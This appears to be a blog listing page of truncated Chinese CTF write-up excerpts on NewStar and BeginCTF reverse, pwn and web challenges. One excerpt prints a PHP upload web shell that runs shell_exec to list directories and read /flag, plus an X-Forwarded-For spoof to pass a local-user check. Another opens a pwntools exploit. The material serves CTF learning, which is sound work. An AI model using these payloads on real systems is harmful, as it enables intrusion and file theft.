• 2024-10-26NewStar re ezencrypt wp
    NewStarreezencryptwpjadx打开[外链图片转存中…(img-qiKfNETY-1729913193217)]发现加密,点进去[外链图片转存中…(img-q5cEWSnD-1729913193218)]发现先AES加密,key是title,然后Base64编码,让母后doEncCheck,我们没找到doEncCHeck的源码官解提到有native标签说明函
  • 2024-10-24CTF Week8 WP
    作业管理系统简单的PHP上传,传一个带shell的php文件就可以了.示例文件<?phpechoshell_exec("ls/");echoshell_exec("cat/flag");phpinfo();?>来源:题库LocalCat验证是否为本地用户,在请求头部添加X-Forwarded-for:127.0.0.1即可.来源:题库电子木鱼Rust代码审
  • 2024-10-01Newstar Re wk1 wp
    NewstarRewk1wpNewstarRewk1wp练一下markdown语法(有些地方明显是为了使用markdown语法而硬造的)begin 引导新手使用IDAPro。用IDAPro打开,根据英语引导可知flag分为三部分,依次寻找:第一部分:点进&flag_part1,可找到第一部分。使用小端序存储所以要倒着看(一般直接用Shift+E提
  • 2024-03-06NewStar Week2-3部分pwn wp
    stack_migrationchecksec开启了NX保护,但是没有PIE和Canary代码审计可以看到有两个read和一个printf。第一个read没什么用我们看第二个。因为v2距离rbp有0x50个字节,而read只能读入0x60个字节,意味着我们剩余的字节数只有0x10,没法构造完整的ROP链,那么我们就只能利用栈迁移来变
  • 2024-03-02杂七杂八wp(NewStar_Week1和BeginCTF2024的部分pwn)
    碎碎念咱就一纯小白,以为带了Begin这一单词的CTF能对我仁慈一点,结果吧,太喜欢了,被狠狠拷打,从头自闭到尾,属于是从这次比赛又狠狠学习到不少知识了废话不多说,上正文嘞BeginCTFOne_bytechecksec嗯,基本啥都开了,喜欢捏。但是尊贵的CTFer,该“源审,启动!”了可以看到两个read,一个是
  • 2023-10-16newstar week2
    REPZthon发现是python写的,先用pyinstxtractor解包,然后将PZthon.pyc用pycdc反编译得到源码#SourceGeneratedwithDecompyle++#File:PZthon.pyc(Python3.9)defhello():art='\n___
  • 2023-10-03Newstar CTF 2023
    WEEK1PWN1.ezshellcode直接sendline(shellcode)即可exp:frompwnimport*p=remote("node4.buuoj.cn",29374)#p=process('/home/miyu/Desktop/ezshellcode')context(log_level='debug',arch='amd64',os='linux